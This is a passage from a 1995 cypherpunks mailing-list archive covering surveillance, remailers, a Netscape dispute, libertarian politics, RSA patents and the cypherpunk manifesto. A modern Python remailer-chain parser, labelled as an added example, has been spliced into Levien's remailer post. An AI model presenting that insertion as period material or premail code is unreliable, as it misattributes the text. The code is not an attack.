exorbitantly high, but not so high that I'm charging them five
figures an hour to write the thing, and I can't imagine needing an
hour per page, including the title and other pages.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 13 Nov 1995 20:36:33 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <accc2f98010210047312@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into investigating
>the usefulness of NNs for image processing or for scanning raw ELINT,
>SIGINT or COMINT data.  In fact, I'd be quite surprised if they weren't.

These are well-known applications. The drug enforcement folks have programs
running at a place called the "El Paso Information Center" (EPIC), from
what I recall. Analyzing flights, passenger lists, etc., using various
AI/pattern recognition programs. (Some say the El Paso locale has tendrils
reaching to E Systems, Cray installations, etc., but I wouldn't know.)

I recall reading of some contracts let out, and other RFCs, for AI programs
for FinCEN use. Not surprising. (If I ran FinCEN, this is what I'd surely
have a bunch of folks working on. Scary thought.)

A bunch of AI-oriented job shops, such as Kestrel Institute and ADS, have
links to intelligence and law enforcement. Really too many possible
examples, and not surprising.

>While NNs may not be of direct relevance to cryptanalysis, I suspect
>they are, or will be, of great relevance to the task of identifying
>what communications should be cryptanalyzed or otherwise scrutinized.
>Especially given the high volume of traffic our 'thinkpol' aspire to
>be able to listen to.

Sure. Preprocessing of intercepts and signals, etc., is a natural application.

The point about neural nets not likely to be used in pure cryptanalysis was
a carefully limited point.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 13 Nov 1995 14:30:50 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511130552.VAA16515@ix2.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951113011903.19675C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Nov 1995, Bill Stewart wrote:

> >> > According to the government's own statistics, 1,800 innocent conversations
> >> > are intercepted each and every time a wiretap or other form of electronic
> >> > surveillance is placed.
> >> This seems curiously inefficient, even for government work.
> 
> There was a discussion on the radio the other day that indicated that
> some drug dealers really _are_ encoding data on their phones - though
> Clipper won't help at all.  The author was talking about hanging out with
> undercover drug agents while doing research on a book about the Mob or drug
> dealers or whatever.  He and the cop were in a bar where a bunch of
> high-level dealers were hanging out; many of them were on their cellphones
> having conversations about "The 'patio furniture' you ordered is here.
> We can get you the 'three tables' on Tuesday; would you like a couple of
> 'chairs' with them also?"  :-)  The dealers weren't bothered by the cops
> being there; their lawyers were over at the next table in case they were needed.

This kind of "coded" talk is frequent in drug cases and is generally easy 
to break -- and to prove what the words meant to the jury.  It can even 
have an unintended probative effect if the defense doesn't put on some 
evidence to support the "patio furniture," or whatever, story.


EBD

> #--
> #				Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
> # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 Nov 1995 12:47:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511131056.CAA06282@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 11 Nov 1995, Ray Cromwell wrote:

>> I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
>> spokesperson, I think that you should rethink what you're suggesting. 
>> Your tactics won't serve your personal interests on this one.  I really
>> would recommend that you come clean.  This is not about "gloating".  I 
>> really take very little pleasure in this.
> 
>   Jeff, I think it's in your best interest to not waste your time
> responding to this moron (who bears many features in common with
> Detweiler)

I'm sure that most lawyers are probably advising Netscape's founders
to not respond -- just like Fuhrman, they should take the fifth
on this one. 

Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
smells like a failure to disclose a material event.  Netscape stock has
advanced almost 50% since the Bugs Bunny post. 

Some investors are gonna be mighty pissed.

Then again, what would I know ...



Alice de 'nonymous ...

                                  ...just another one of those...
                                                  ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 13 Nov 1995 23:14:05 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511131450.GAA15424@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     -----------   1:32:59  99.95%
ideath   remailer@ideath.goldenbear.com   -_.--------   5:58:20  99.94%
rmadillo remailer@armadillo.com           +++ ++++++++    39:25  99.92%
penet    anon@anon.penet.fi               ---+-------   6:09:10  99.86%
ecafe    cpunk@remail.ecafe.org           #*#*# #--*+*    38:11  99.86%
alumni   hal@alumni.caltech.edu           *+*--***+* *    13:43  99.63%
wmono    wmono@valhalla.phoenix.net       ****++-++* *    17:07  99.62%
replay   remailer@replay.com              **+**+*++* *    11:27  99.60%
vishnu   mixmaster@vishnu.alias.net       **-*+*+ **+*    14:30  99.38%
robo     robo@c2.org                      #*#*####** *     4:30  99.26%
hacktic  remailer@utopia.hacktic.nl       **+**+**** *    10:30  99.26%
spook    remailer@valhalla.phoenix.net    *****+-++* *    23:14  99.25%
flame    remailer@flame.alias.net         + +**++*** *    20:38  99.21%
portal   hfinney@shell.portal.com         #**--+#*   *    13:15  99.08%
bsu-cs   nowhere@bsu-cs.bsu.edu           *##++ ##** *     7:53  99.01%
c2       remail@c2.org                    *  -++++++      45:17  96.60%
ford     remailer@bi-node.zerberus.de     _ .    _ _-  53:08:59  93.60%
rahul    homer@rahul.net                  +-**----**+*    15:00  99.98%
extropia remail@extropia.wimsey.com            .--..-* 11:56:59  84.16%
syrinx   syrinx@c2.org                    --++++-+-  +  7:07:35  79.75%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
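
An added example, not part of the post above and not premail's own code: a Python parser for the listing format it describes, which then picks a chain of remailers that all carry the required capability keywords, avoid unwanted ones, meet an uptime floor, and never place two hops in the same "sharing a machine or operator" group. The function names, the thresholds and the reading of the latency column as [h:]mm:ss are assumptions; the sample is a constructed excerpt of lines copied from the listing.

```python
import re

# Constructed sample: a subset of lines copied from the listing in the post.
SAMPLE = '''\
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)

mix      mixmaster@remail.obscura.com     -----------   1:32:59  99.95%
replay   remailer@replay.com              **+**+*++* *    11:27  99.60%
hacktic  remailer@utopia.hacktic.nl       **+**+**** *    10:30  99.26%
spook    remailer@valhalla.phoenix.net    *****+-++* *    23:14  99.25%
flame    remailer@flame.alias.net         + +**++*** *    20:38  99.21%
c2       remail@c2.org                    *  -++++++      45:17  96.60%
rahul    homer@rahul.net                  +-**----**+*    15:00  99.98%
syrinx   syrinx@c2.org                    --++++-+-  +  7:07:35  79.75%
'''

ENTRY = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
GROUP = re.compile(r'^\(([^()]+)\)$')
# The history column may contain spaces, so match it lazily up to the latency.
STATS = re.compile(r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d+)\s+(\d+\.\d+)%$')


def to_seconds(latency):
    """Convert [h:]mm:ss to seconds (assumed reading of the latency column)."""
    secs = 0
    for part in latency.split(":"):
        secs = secs * 60 + int(part)
    return secs


def parse_listing(text):
    """Return (remailers, groups) parsed from both parts of the listing."""
    remailers, groups = {}, []
    for line in text.splitlines():
        line = line.rstrip()
        if m := ENTRY.match(line):
            name, addr, flags = m.group(1), m.group(2), m.group(3).split()
            caps = {f.rstrip(".") for f in flags}
            # "pgp." means the short name, not the address, is the key ID.
            key_id = None
            if "pgp" in caps:
                key_id = name if "pgp." in flags else addr
            remailers[name] = {"address": addr, "caps": caps, "key_id": key_id,
                               "uptime": None, "latency_s": None}
        elif m := GROUP.match(line):
            groups.append(set(m.group(1).split()))
        elif (m := STATS.match(line)) and m.group(1) in remailers:
            entry = remailers[m.group(1)]
            entry["latency_s"] = to_seconds(m.group(4))
            entry["uptime"] = float(m.group(5))
    return remailers, groups


def choose_chain(remailers, groups, hops, require, exclude, min_uptime):
    """Pick `hops` remailers, best uptime first, at most one per shared group."""
    ok = [n for n, r in remailers.items()
          if require <= r["caps"] and not (exclude & r["caps"])
          and r["uptime"] is not None and r["uptime"] >= min_uptime]
    ok.sort(key=lambda n: (-remailers[n]["uptime"], remailers[n]["latency_s"]))
    chain, blocked = [], set()
    for name in ok:
        if name in blocked:
            continue
        chain.append(name)
        blocked.add(name)
        for group in groups:          # co-located remailers count as one hop
            if name in group:
                blocked |= group
        if len(chain) == hops:
            return chain
    raise ValueError("not enough independent remailers meet the constraints")


if __name__ == "__main__":
    rem, grp = parse_listing(SAMPLE)
    print(choose_chain(rem, grp, 3, {"pgp", "mix"}, {"mon", "filter"}, 99.0))
```
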




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 13 Nov 1995 14:27:39 +0800
To: cypherpunks@toad.com
Subject: Re: Gingrich, "crypto coalition" [*PURE* NOISE]
Message-ID: <199511130558.GAA12778@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


VZNuri:

>  but my main point in writing was that I thought I would highlight this 
>  phrase given to us by A.Nonymous: the "crypto coalition".
>  or it might be called the "computer coalition". I think I see a few
>  faint glimmerings of a new political movement, potentially.
>  the recent Washington Times editorial on the Exon pornography law,
>  encryption, and the superiority of allowing people to develop tools
>  to screen what they don't want to so, could be considered a
>  portrayal of some of the key philosophies.

      I see <A> the flames of a bunch of brats with a lot of disposable
income, and <B> a sysop culture armed with buckets of water they'd rather
not use lest it short out their technocratic "ethics."

>  its very interesting to contemplate that the online crowd could become
>  a more well-organized political coalition that has influence in politics.
>  its clear to me this is happening weakly and informally at the moment.
>  (i.e. people on the internet having similar philosophies, hence voting
>  with the same aims, although not organizing to do so yet).
>  a key ingredient I see working against this:

      Point-and-click organizing and killfile absorption of discourse. Harrumph.

>  the "coalition" has a lot of libertarian sentiments, and libertarians
>  tend to be anti-government and almost disdainful of even participating
>  in politics.

      In GROUP politics. Libertarianism is recursively structured: "when
there's no gubmint" -- I ain't holding my breath -- they won't trust
themselves.

>  one might differentiate between cybernauts who are interested in reforming
>  our government and using the Net as a tool to do so, such as Jim Warren, and
>  people at the opposite end of the spectrum of "participation" such as
>  TCM, who seem to advocate that political battles be simply rejected
>  or ignored as irrelevant to the future of "cryptoanarchy". (although recent 
>  noises of his I quoted were distinctly uncharacteristic.)

      To paraquote one of my favorite lesbians, a meme is a meme is a meme
is a meme is a meme. The idea that memes will change the world is very
typical of our era, which is to say very naive. Warren works, TCM plays;
Warren works, and TCM -- who, it's abundantly clear, is brilliant in his
own way -- gambles: gambles that the memes he's "trademarked" might pan
out.

>  if anyone is going to have influence in politics, it would be the former
>  type. but at least in the places in cyberspace where I hang out, I tend
>  to see more of the latter type: extremist libertarians who almost seem
>  to suggest that government is inherently unclean and dirty, no matter
>  what form it takes. I think these are the types that would hate a
>  government and advocate disenfranchisement with it no matter what 
>  direction it took, even if a libertarian was
>  elected to a powerful office. (its an interesting question to contemplate).

      Not really: libbies would rather play a low-stakes game with their
own back yard than a high-stakes game with society, in which everyone is
in each others' back yard.

>  it seems to me to be largely a philosophy of alienation bordering
>  on nihilism.

      Yes. 

>  now, I have been trashed in public for this position before, but the
>  philosophy of "us vs. them" applied to government in my opinion is the
>  wrong paradigm and only contributing to the problems, imho. an organized
>  "cyberspace coalition" could have tremendous political power to the point
>  that all the key annoying laws (such as the Itar etc.) actually become
>  election issues brought into mainstream consciousness. the editorials
>  I have seen about the Exon amendment etc. are steps in those directions.

      Trashed *as a tentacle*.
      Crypto as a litmus test isn't interesting: crypto is a means to an
end. What is that end? For too many, it is "antigovernment" -- that is,
reactionary.

>  I've seen TCM argue on this list against this, such that we should just
>  give up on telling congress what is important to us etc.  it was a position
>  that was not unanimous, and in fact quite controversial however, and 
>  remarkably PM once argued against it. (heh. love the fireworks on this list.
>  they are quite unpredictable at times).

      Perry has grime under his fingernails. Perry works, works with other
people toward definable ends: Perry is, among other things, a craftsman.
And if I'm not mistaken, he lives in a place where he gets to see how many
people live, and how they live together; this is very different from
*choosing to* live where and how TCM does. (Is this a "scurrilous attack,"
in TCM's words? Or is it just the expression of an opinion? Dr. Fred may
be an oaf, but the *reaction* to him demonstrates just how stupid it is to
say anything that doesn't toe the line on *this* list, despite all the
I-and-thou mumbojumbo.)

>  I'm all for replacing a dysfunctional government. but people here seem
>  to advocate that this happens automatically when one has certain 
>  technology.

      "Replacing" is a participle: what is the agent? If the agent is an
individual, or an alienated mass of individuals, it will not be able to
replace the govt; if, OTOH, it's a mass of ORGANIZED individuals, it is no
longer libertarian.

>  there is a whole other approach to "cryptoanarchy" that no one here
>  has ever suggested, but which could be tremendously effective: "infiltrate"
>  political positions with people sympathetic to that philosophy, and work
>  to change the entire structure toward it. "infiltrate" is a scary word,
>  but IMHO nothing any different than demopublicans appointing demopublicans
>  to office would be going on.

      This is crypto-anarchy, with "crypto-" meaning what it does to most
of the people who use it: X passing as Y, a crypto-fascist for example. And
"infiltrate" is nothing more than a fancy word for working within the
system, namely, reformism.

>  a very interesting, key quote by someone here went to the effect: "if
>  TCM is right, nothing the government does matters. if TCM is wrong, 
>  nothing we do matters". a fascinating psychological justification for
>  a sort of nihilism. but at the root of it is a kind of laziness and
>  hostility to organization or groups in any form, IMHO.

      Yes: this hostility to organization is an old thread in American
culture. It's usually associated with antiurbanism, anticosmopolitanism,
things like that, but most libbies I've ever met (which is a lot) are
more anti-control than pro-freedom. You do the math.

>  in fact the libertarian extremists here seem not only to hate government,
>  they seem to hate the whole idea of groups accomplishing things, about
>  the idea of groups coming to consensus. this is a quite remarkably
>  cynical ideology.

      Cynical? How about naive?

>  I'm going to make a prediction: I think the people who are interested
>  in organizing the "cyberspace coalition" are starting to come together
>  right now, and that over the long run, this entity will be far more
>  beneficial in advancing a better reality through cyberspatial technology
>  than all the people who advocate disillusion, antagonism, resentment, 
>  and nonparticipation in groups and government, to the point the latter 
>  approach will be generally discredited. in other words, we have a powerful 
>  system that can be changed from the inside instead of abandoning it. at the 
>  moment, I've not seen any proof that a dedicated group couldn't reform
>  it from the inside, only a lot of cynical conventional wisdom that such
>  a thing is inherently impossible and useless to try.

      If you haven't seen any proof that it can't be reformed, then you
haven't looked at the piechart on the back of the 1040 booklet.

>  the comment I quoted displays the conventional wisdom on this list, 
>  that the encryption issue is "us vs. them", "people vs. the government",
>  etc.  what would A.Nonymous say if someone who was elected began to 
>  embrace the position that encryption is a right? I'm sure he would find
>  some new reason to be disillusioned with government. that's the position
>  of radical libertarians. no matter what form government takes, no matter
>  who is driving it, they hate it. 

      "Encryption is a right" reveals that crypto-libbies are honkey-man
analogs of PC creeps: everything is a right.

>  the first lesson for radical libertarians bordering on anarchists 
>  that love this list is not that Oppressive Government is  the problem, but 
>  that Government Is Always Bogus. a rather infantile philosophy that reminds
>  me of the way children defy authority or structure merely because it
>  is an authority or a structure, not because of any particular disagreements
>  they have with the underlying philosophy it expresses. (or rather, they
>  manufacture the disagreement with the philosophy as required, such that
>  the reasoning is, if an authority stands for [x], then I am against [x], and
>  against that authority).

      Yes.

>  and this is precisely the dysfunctional
>  philosophy to life I am referring to that I think will be discredited in 
>  the long run as intellectually vacuous and actually counterproductive to
>  any kind of progress.

      Yes.

>  from what I have seen of Gingrich, he might be a potential leader of this
>  kind of "computer coalition". he is the congressman who has taken stands
>  on encryption issues and other key cyberspace issues that seem to suggest
>  an internal awareness of constitutional rights superseding momentarily-
>  politically-fashionable government legislative whims. of course I'm
>  putting on my flameproof longjohns as I say that.

      Don't bother putting anything on. He's a tool, a chump to his own
megalomania: I'd love to see that pussy get elected. The moment someone
sneezed, he'd set up a howl louder than a cat with a firecracker up its
butt. He's just as snively as anyone else these days.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 13 Nov 1995 20:32:35 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511131056.CAA06282@jobe.shell.portal.com>
Message-ID: <199511131202.HAA01945@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I, too, would advise NetScape to ignore this loon. Whether the person
behind it is "Dr." you-know-who or Detweiler or some third party loon
is immaterial. The fact of the matter is that although NetScape has
had security issues, the ones brought up by "Alice" are totally bogus.

.pm

anonymous-remailer@shell.portal.com writes:
> On Sat, 11 Nov 1995, Ray Cromwell wrote:
> 
> >> I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
> >> spokesperson, I think that you should rethink what you're suggesting. 
> >> Your tactics won't serve your personal interests on this one.  I really
> >> would recommend that you come clean.  This is not about "gloating".  I 
> >> really take very little pleasure in this.
> > 
> >   Jeff, I think it's in your best interest to not waste your time
> > responding to this moron (who bears many features in common with
> > Detweiler)
> 
> I'm sure that most lawyers are probably advising Netscape's founders
> to not respond -- just like Fuhrman, they should take the fifth
> on this one. 
> 
> Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
> smells like a failure to disclose a material event.  Netscape stock has
> advanced almost 50% since the Bugs Bunny post. 
> 
> Some investors are gonna be mighty pissed.
> 
> Then again, what would I know ...
> 
> 
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                   ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 21:59:36 +0800
To: cypherpunks@toad.com
Subject: (fwd) Digital Signature Patent
Message-ID: <v02120d01acccf5f21b79@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


For those as get Info Week...

Cheers,
Bob Hettinga

--- begin forwarded text

Mime-Version: 1.0
Date: Mon, 13 Nov 1995 08:08:47 -0500
To: rah@shipwright.com
Subject: Digital Signature Patent

for your information...

-----------------------------------------------------------------------
RSA WANTS LICENSE FOR DIGITAL SIGNATURE TECHNOLOGY

RSA Data Security claims it owns the dominant patent covering
digital signature technology, and wants other companies and
government agencies to pay them license fees for using it.

The U.S. government is fighting RSA's claim, saying the digital
signature algorithm it uses in its digital signature standard
is covered by a different patent.  If RSA can make its claim
stick, the government will owe the encryption company royalties
for use of its digital signature standard.

source: Information Week
        13 Nov 95
        p20

via edupage

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 14 Nov 1995 07:19:47 +0800
To: cypherpunks@toad.com
Subject: what's going on
Message-ID: <199511130745.IAA15877@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Privacy is necessary for an open society in the electronic age.
Privacy is not secrecy.  A private matter is something one doesn't
want the whole world to know, but a secret matter is something one
doesn't want anybody to know. Privacy is the power to selectively
reveal oneself to the world.  

If two parties have some sort of dealings, then each has a memory of
their interaction.  Each party can speak about their own memory of
this; how could anyone prevent it?  One could pass laws against it,
but the freedom of speech, even more than privacy, is fundamental to
an open society; we seek not to restrict any speech at all.  If many
parties speak together in the same forum, each can speak to all the
others and aggregate together knowledge about individuals and other
parties.  The power of electronic communications has enabled such
group speech, and it will not go away merely because we might want it
to.

Since we desire privacy, we must ensure that each party to a
transaction have knowledge only of that which is directly necessary
for that transaction.  Since any information can be spoken of, we
must ensure that we reveal as little as possible.  In most cases
personal identity is not salient. When I purchase a magazine at a
store and hand cash to the clerk, there is no need to know who I am. 
When I ask my electronic mail provider to send and receive messages,
my provider need not know to whom I am speaking or what I am saying
or what others are saying to me;  my provider only need know how to
get the message there and how much I owe them in fees.  When my
identity is revealed by the underlying mechanism of the transaction,
I have no privacy.  I cannot here selectively reveal myself; I must
_always_ reveal myself.

Therefore, privacy in an open society requires anonymous transaction
systems.  Until now, cash has been the primary such system.  An
anonymous transaction system is not a secret transaction system.  An
anonymous system empowers individuals to reveal their identity when
desired and only when desired; this is the essence of privacy.

Privacy in an open society also requires cryptography.  If I say
something, I want it heard only by those for whom I intend it.  If 
the content of my speech is available to the world, I have no
privacy.  To encrypt is to indicate the desire for privacy, and to
encrypt with weak cryptography is to indicate not too much desire for
privacy.  Furthermore, to reveal one's identity with assurance when
the default is anonymity requires the cryptographic signature.

We cannot expect governments, corporations, or other large, faceless
organizations to grant us privacy out of their beneficence.  It is to
their advantage to speak of us, and  we should expect that they will
speak.  To try to prevent their speech is to fight against the
realities of information. Information does not just want to be free,
it longs to be free.  Information expands to fill the available
storage space.  Information is Rumor's younger, stronger cousin;
Information is fleeter of foot, has more eyes, knows more, and
understands less than Rumor.

We must defend our own privacy if we expect to have any.  We must
come together and create systems which allow anonymous transactions
to take place.  People have been defending their own privacy for
centuries with whispers, darkness, envelopes, closed doors, secret
handshakes, and couriers.  The technologies of the past did not allow
for strong privacy, but electronic technologies do.

We the Cypherpunks are dedicated to building anonymous systems.  We
are defending our privacy with cryptography, with anonymous mail
forwarding systems, with digital signatures, and with electronic
money.

Cypherpunks write code.  We know that someone has to write software
to defend privacy, and since we can't get privacy unless we all do,
we're going to write it. We publish our code so that our fellow
Cypherpunks may practice and play with it. Our code is free for all
to use, worldwide.  We don't much care if you don't approve of the
software we write.  We know that software can't be destroyed and that
a widely dispersed system can't be shut down. 

Cypherpunks deplore regulations on cryptography, for encryption is
fundamentally a private act.  The act of encryption, in fact, removes
information from the public realm.  Even laws against cryptography
reach only so far as a nation's border and the arm of its violence.
Cryptography will ineluctably spread over the whole globe, and with
it the anonymous transactions systems that it makes possible. 

For privacy to be widespread it must be part of a social contract.
People must come and together deploy these systems for the common
good.  Privacy only extends so far as the cooperation of one's
fellows in society.  We the Cypherpunks seek your questions and your
concerns and hope we may engage you so that we do not deceive
ourselves.  We will not, however, be moved out of our course because
some may disagree with our goals.

The Cypherpunks are actively engaged in making the networks safer for
privacy.  Let us proceed together apace.

Onward.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:45:05 +0800
To: cypherpunks@toad.com
Subject: Re: The Crypto Applications we would rather not talk about
Message-ID: <199511131617.IAA28486@well.com>
MIME-Version: 1.0
Content-Type: text/plain


>     Anonymous remailer and PGP
>     Unusual applications
>
>I don't know if anyone else caught it last year
>but High Times discovered anonymous remailers
>and PGP for an article last year for
>anonymous remote control of grow rooms.
>

Actually, the NYT Magazine did a cover story on pot growing within the last
year, and toward the end one of the Americans doing grow rooms in Holland
said specifically that he was looking toward anonymous electronic
communications as a way to control his grow rooms remotely and securely.

Lee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:29:00 +0800
To: cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511131617.IAA28561@well.com>
MIME-Version: 1.0
Content-Type: text/plain


I realize I'm a little late in this thread, but I'm pretty far behind in my
e-mail.  I oversimplify here, but what's new.

Anyway, all I wanted to say is that treaties are *not* superior to acts of
Congress, as far as I know (they do override state law).  I'm not an
international lawyer, but it was held long ago that a properly ratified
treaty is "equivalent to an act of the legislature."  Foster v. Neilson, 27
U.S. (2 Pet.) 253, 314 (1829) (Marshall, C.J.).  Note also that a treaty is
not necessarily self-executing; if it requires appropriation of funds,
Congress needs to act again.  Whether Congress may decline to implement is
unclear.  

Finally, the Supreme Court has also held that when there is conflict
